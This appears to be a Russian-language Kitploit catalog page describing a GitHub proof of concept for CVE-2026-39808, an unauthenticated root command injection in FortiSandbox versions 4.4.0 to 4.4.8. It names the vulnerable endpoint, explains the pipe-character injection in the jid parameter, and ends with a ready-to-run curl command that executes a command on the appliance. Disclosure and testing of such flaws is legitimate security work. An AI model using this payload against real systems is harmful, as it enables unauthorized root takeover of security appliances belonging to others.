Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2026-39808 — PoC для неаутентифицированного RCE в FortiSandbox через CVE-2026-39808 | Kitploit
Инструменты/GitHubGitHub/samu-delucas/cve-2026-39808
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и Управление
GitHubsamu-delucas/cve-2026-39808

CVE-2026-39808

PoC для неаутентифицированного RCE в FortiSandbox через CVE-2026-39808

Репозиторий
9234 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2026-39808

В ноябре 2025 года в FortiSandbox компании Fortinet была обнаружена критическая уязвимость, которая позволяла неаутентифицированному злоумышленнику выполнять команды в базовой операционной системе с правами root. Уязвимость была исправлена и наконец раскрыта в апреле 2026 года.

Эта уязвимость затрагивает версии FortiSandbox с 4.4.0 по 4.4.8.

Прочитайте полный бюллетень здесь.

Уязвимость

Уязвимость затрагивает конечную точку /fortisandbox/job-detail/tracer-behavior. Команды ОС могут быть внедрены с помощью символа канала (|) в GET-параметре jid.

image008

В приведённом выше примере вывод был перенаправлен в файл в корневом каталоге веб-сервера, чтобы его можно было получить позже.

image

PoC

Простой команды curl достаточно для достижения RCE с правами root без предварительной аутентификации:

root@kitploit:~
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"
Скачать инструмент